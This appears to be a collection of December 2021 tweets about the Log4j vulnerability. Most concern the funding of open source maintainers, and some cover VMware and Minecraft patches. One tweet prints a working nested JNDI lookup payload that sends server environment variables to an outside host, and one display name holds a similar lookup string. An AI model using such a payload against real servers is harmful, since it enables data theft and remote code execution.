Watching this log4j bug metastasize, I’m seeing people ask why industry doesn’t fund open source. I don’t have a great answer, but I have some thoughts following the experience with Heartbleed in ‘14. 1/
— Matthew Green (@matthew_d_green) December 11, 2021
I get about $2,000 a month from GitHub sponsors. Let’s talk about funding for open source projects, specifically my thoughts for @tldraw. https://t.co/1Fi5tzWsgZ
— Steve Ruiz (@steveruizok) December 12, 2021
This log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft have all been confirmed vulnerable.
— Marcus Hutchins (@MalwareTechBlog) December 10, 2021
Millions of $$$ are floating around bug bounties which do very little in fixing the underlying core issues we face.
— Andrea Barisani (@AndreaBarisani) December 12, 2021
Yet critical dependencies which are everywhere struggle in getting adequate backing, only hostility when they break.
Pay maintainers, pay proper security audits. https://t.co/VT7XJK7dJI
Okta RADIUS and MFA server are vulnerable and exploitable and need upgrading ASAP https://t.co/WvojrhBQRA pic.twitter.com/RZ7wJCbc7F
— Kevin Beaumont (@GossiTheDog) December 11, 2021
No one is paying the log4j2 maintainers!?
— Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile) December 10, 2021
There is a whole page on the responsibilities of a @TheASF "Project Management Committee"... AND NO ONE IS PAYING THEM? https://t.co/JXimIQLxw5
Open Source needs to grow the hell up. Yesterday.https://t.co/tQpITt8vn3
In case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like
— Tanner Barnes (@_StaticFlow_) December 10, 2021
${jndi:ldap://${env:user}.xyz.collab.com/a}
Will leak server side env vars!
This is going to sound blunt, but it's a distribution problem not a funding problem. $ is easy.
— Dan Lorenc (@lorenc_dan) December 12, 2021
Corporations have budget and are willing to spend, but it takes too much time. Finding projects that need help and maintainers willing to help in exchange for money is hard. pic.twitter.com/mFkOoOVYXn
Interesting that "supply chain vulnerabilities" have become a crisis in both the physical world and the web (open source library dependencies) at the same time.
— Chris Anderson (@chr1sa) December 12, 2021
The perpetual pendulum between distributed and centralized will now swing back to the latterhttps://t.co/GnalKfmBrC
The Apache Log4j project is maintained by three people who are volunteering their spare time. Please don't be a jerk to them because multi-billion dollar companies are using their tool without even bothering to throw $1,000 their way. https://t.co/2pjh7FG7h4
— Catalin Cimpanu (@campuscodi) December 11, 2021
Great post — charity-based open source is very naive and unrealistic, if only because its 100x more complicated for a business to pay someone for nothing than it is for something.https://t.co/0YsYcMXifk pic.twitter.com/34r6ofYnNm
— Adam Wathan (@adamwathan) December 11, 2021
Log4j recap
— Kevin Beaumont (@GossiTheDog) December 12, 2021
- two random unpaid folk maintain the code
- a random requested the vuln/feature in 2013
- major IT and security vendors rely on that code
- problem was publicised by teens in Minecraft video game
- scope of problem still unclear days later pic.twitter.com/dK7RTNCV3b
I love when people share ideas like this, especially when they're backed by current events#opensource https://t.co/p1lTYIxJRd
— Joshua Powell (@joshuapowell_io) December 11, 2021
but the real answer is crypto... totally right problem to identify but invoicing companies for maintaining open source software is lol. https://t.co/UkniROBq6J
— sam lessin (@lessin) December 12, 2021
DAOs were literally born to solve this
— jjacopo.eth (@jj_ranalli) December 12, 2021
Thinking of building a tool for DAOs to fund open source projects on @github and handle treasury through @juiceboxETH
Someone stop me (or join me) https://t.co/0PZ94tuk8N
The world would be so much better off if maintaining open source software were a viable profession. One day…? https://t.co/b3tcTGiBIe
— R. Miles McCain (@MilesMcCain) December 11, 2021
Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. https://t.co/W2u6AcBUM8
— Volkan Yazıcı (@yazicivo) December 10, 2021
Open source maintainer as a career path. There are just a few companies who understand the benefits of funding open source development, and it’s challenging to keep explaining that to others. Luckily I was able to find some already. Thanks for that! https://t.co/PPIV0otdTj
— Jan Žák (@zakjan) December 12, 2021
Open source spent the 1990s trying to convince corporations they could trust it, the 2000s delighted at its success in corporations, the 2010s begging corporations to help pay for the enormous maintenance costs being shouldered by random individuals. https://t.co/UR0VugGK12
— Laurie Voss (@seldo) December 12, 2021
As a follow-up: @FiloSottile has a nice post about professionalizing the role of OSS maintainer. This is great! But I would still argue that money is finite, and knowing which projects need help is a basic missing ingredient. https://t.co/7IZadI4fy6
— Matthew Green (@matthew_d_green) December 11, 2021
This is well-intentioned but saying "companies are in the business of getting what they need—by paying invoices" show incredible naivety in how bad companies are at paying their invoiceshttps://t.co/vVVQb6zaJD
— Andrew White (@pixeltrix) December 11, 2021
Once again, an Open Source Software maintained by a few people on their spare time, used by a lot of companies on their projects, has a big vulnerability.
— Romain Rastel ? (@lets4r) December 12, 2021
When companies will understand that it's on their interest to support financially OSS? https://t.co/DA6hJCvOND
Controversial opinion: RedHat, AWS, GCP, GitHub, NPM, etc should pay F/OSS developers.https://t.co/AQ7t86o8bg
— ☣purely editorial☣ (@chromatic_x) December 11, 2021
Endorse all this. There are a ton of engineers, of all experience levels, who would jump at the chance to do this kind of work if they could make a stable career out of it. https://t.co/i8ANhX9IMn pic.twitter.com/70yfUUgIBG
— Matt Ficke (@mattficke) December 11, 2021
When Heartbleed dropped, it was very similar to log4j: an underfunded OSS project (OpenSSL) that nobody thought about, but was *everywhere*. It took everyone by surprise, and even woke industry up. The result was a surge of funding. 2/
— Matthew Green (@matthew_d_green) December 11, 2021
We all agree the status quo is unsustainable.
— Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile) December 11, 2021
Here are 1,000 words on how we could get the role of Open Source maintainer to graduate to a real, properly paid profession.
The thing is, companies need it as much as maintainers do.https://t.co/RK26lKGg3h
This is the maintainer who fixed the vulnerability that's causing millions(++?) of dollars of damage.
— Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile) December 10, 2021
"I work on Log4j in my spare time"
"always dreamed of working on open source full time"
"3 sponsors are funding @rgoers's work: Michael, Glenn, Matt"
People, what are we doing. pic.twitter.com/2hAxUWCjuC
When people say "you didn’t build that" they’re not just talking about how highways and public education contribute to corporate success. They’re also talking about this. Open source is the vital foundation of nearly every corporate software asset. And it gets no respect. https://t.co/elRM7dgRac
— Love In The Time Of Covid (@JimJ_candid) December 11, 2021
Player safety is the top priority for us. Unfortunately, earlier today we identified a security vulnerability in Minecraft: Java Edition.
— Minecraft (@Minecraft) December 10, 2021
The issue is patched, but please follow these steps to secure your game client and/or servers. Please RT to amplify.https://t.co/4Ji8nsvpHf
This! I am thankful to all GitHub Sponsors and Patreons, but without my day2day job @ISCdotORG (which is thankfully also working on Open Source), I would be able to sustain my family. https://t.co/omf3ijiNJY
— Ondřej Surý ?? (@oerdnj) December 11, 2021
It takes lack of attention. In Heartbleed, someone merged a dumb feature quickly without doing careful code review.
— Matthew Green (@matthew_d_green) December 11, 2021
In log4j someone merged a dumb feature that any security expert would have recoiled at.
„This person's spare time passion project is responsible for half of the internet working the way it should. Vulnerable companies to this issue included Apple, Google, my cell phone carrier and everyone that uses JavaEE in its default configuration.“ https://t.co/ISp5UqJyPt
— Andreas Baumgartner (@bmgnrs) December 12, 2021
New blog post in which I touch upon the discourse regarding how open source maintainers can get paid.
— Nadim Kobeissi (@kaepora) December 12, 2021
I'll spare you my efforts to make my tweet more flashy, viral, have a strong hook, or whatever it is I'm supposed to do for metrics. https://t.co/qf2oZpdlkw
On Paying Open Source Maintainers
— Lobsters (@lobsters) December 12, 2021
by @kaeporahttps://t.co/LTOiIwM4H4 #programminghttps://t.co/hlW2ktfpIU
“It's a design failure of catastrophic proportions.”
— Follow Light within (@kevskewl) December 12, 2021
Free Wortley, LunaSechttps://t.co/0b2mvbzt4t
In case you’re worried seeing bits & pieces like this, here’s a civilian-level update on the …catastrophic? #log4j Java vulnerability: https://t.co/F6Lfgk8I0C https://t.co/9HWYketppZ
— LizNeeley (@LizNeeley) December 11, 2021
A Log4J Vulnerability Has Set the Internet 'On Fire' | WIRED https://t.co/MT0tcOz6F8
— Christian Reilly (@reillyusa) December 12, 2021
#tech #technology #IT #startup #startups #cloud #cloudsecurity #data #datascience #hacking #innovation #digitaltransformation #cyberattacks #ransomware #wfh #iot #fintech #security #logging #5g A Log4J Vulnerability Has Set the Internet 'On Fire' https://t.co/L6AS4vkVjL
— Anand Aggala (@aggala) December 12, 2021
? OMG, all that #Minecraft Servers being vulnerable to #log4j
— ? Mirko Ross ?? (@mirko_ross) December 12, 2021
?️ "Minecraft screenshots circulating on forums appear to show players exploiting the vulnerability from the Minecraft chat function."
? https://t.co/KB1cNVszzK#Log4Shell #log4jRCE #log4j2 #cybersecurity
A Log4J Vulnerability Has Set the Internet 'On Fire' https://t.co/oVGSS7ABwT #tech #feedly #CES2022 @AffinityInitia1 @jblefevre60 @kalydeoo @sallyeaves @BetaMoroney @DeepLearn007 @Xbond49 @Ym78200 @ipfconline1 @IanLJones98 @Hana_ElSayyed @AmitChampaneri1 @ravidugh @Khulood_Almani
— Nicolas Babin #CES2022 (@Nicochan33) December 11, 2021
Professional maintainers: a wake-up call https://t.co/q7UsXUWOty
— Bill Bennett (@billbennettnz) December 12, 2021
We all agree the status quo is unsustainable.
— Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile) December 11, 2021
Here are 1,000 words on how we could get the role of Open Source maintainer to graduate to a real, properly paid profession.
The thing is, companies need it as much as maintainers do.https://t.co/RK26lKGg3h
If you’re running VMware products in your environment, you are impacted by the Log4j vulnerability. Check out this KB for workarounds/mitigations for many VMware products: https://t.co/t01clQJLKO
— Sean Massey #blacklivesmatter (@seanpmassey) December 11, 2021
VMware Response to Apache Log4j Remote Code Execution Vulnerability
— Sami Laiho (@samilaiho) December 12, 2021
(CVE-2021-44228)https://t.co/OkgksLoQpW
Classification: Critical, Solution: Update, Exploit: Wild
Make sure to update to the latest @Runecast Analyzer (released today). It discovers the critical vulnerabilities described in VMSA-2021-0028 #vCenter #Horizon #NSX #security #log4j CVE-2021-44228 https://t.co/sngsxfirTG
— Stanimir Markov (@sferk) December 12, 2021
VMwareがとりあえずlog4jの脆弱性で32製品を更新 https://t.co/OEEhN4OCsK
— 高梨陣平 (@jingbay) December 11, 2021
追加するかもよ? とリストの最後に書いてあるのが笑える :-)
VMware advisory, I couldn’t fit the products under investigation on one screenshot ? https://t.co/HvUJUUR2g8 pic.twitter.com/OIPXIYM1ru
— Kevin Beaumont (@GossiTheDog) December 11, 2021
何かすごいの出てる(語彙力)
— つじ (@st_mouton) December 12, 2021
Horizon, vCenter, vRealize Operationsなど諸々https://t.co/M1r4PuQ7fB
Workarounds and patches are available for multiple VMware products that are exploitable by the log4j2 issue — including vCenter, Horizon and the Unified Access Gateway.
— Michael Stanclift (@vmstan) December 11, 2021
Implement. Now. https://t.co/rogNxNgUIx
Perfect 10.0 security vulnerability found in most VMware products. Please spread the word to make everyone aware.
— Russell Hamker (@butch7903) December 11, 2021
VMSA-2021-0028 - VMware Response to Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
Info: https://t.co/y3iiAOdhwq#vExpert #log4j #VMUG
Log4j bug is like a domino ... https://t.co/Qz3o3RCQ0b
— ? Astr0 Baby (@astr0baby) December 11, 2021
The log4j mess exemplifies what I consider the core flaw in the open source ecosystem. People in the industry have now been conditioned to expect so many things for free, but also expect for themselves to get paid. It's hypocritical and unstable. https://t.co/WWf4h9B6VG pic.twitter.com/uWHqZMTOgG
— Billy Hollis (@billyhollis) December 12, 2021
How do you fix this problem? You introduce licensing that requires you to pay money when you build commercial tooling on top of OSS. It's actually a solved problem but despised by so many. https://t.co/cv0Gcc5q2Y
— Hadi Hariri (@hhariri) December 12, 2021
If you use software made by others in their spare time and find it useful, pay them. This should not be a controversial opinion. https://t.co/XDMFIcTlsW
— @mikko (@mikko) December 11, 2021
"Open Source" is Brokenhttps://t.co/vuyGH8szWt#rant
— Xe (@theprincessxena) December 11, 2021
that's why we need DAO, someone builded the internet, but he got nothinghttps://t.co/1Y22Ec0KOf
— Panda (@hellopandadao) December 12, 2021
Open source is broken?https://t.co/JfgTZrfOom pic.twitter.com/dMqGH82w19
— vishwesh.eth (@vishweshji) December 12, 2021
Minecraft公式より対策が発表されました。各バージョンの対策の行い方の詳細はこちらからご覧ください。https://t.co/CvSIziPrEP
— SaziumR (@SaziumR) December 11, 2021
PSA Time Folks:https://t.co/tgziGl5mWN
— Zed A. Shaw, Writer (@lzsthw) December 12, 2021
If you run a Minecraft server or the client (Java edition) then you need to read this and do some work. The recent log4j vulnerability is exploitable and will cause you pain.https://t.co/pmkqSYN4gZ
This is a very serious exploit! The Mojang team have done an amazing job at responding to the issue, and it is to the largest extent resolved. You can read up more about it here: https://t.co/82fcLeafbd
— Gegy (@gegy1000) December 11, 2021
Here's an informational page about the vulnerability and how to deal with it on both client and server side for all versions: https://t.co/GykKstyxgp
— slicedlime (@slicedlime) December 10, 2021
If your kids play Minecraft, make sure they upgrade to 1.18.1 because their box can get hacked with a chat message.https://t.co/MdlZvctfOe
— Heath Borders (@heathborders) December 11, 2021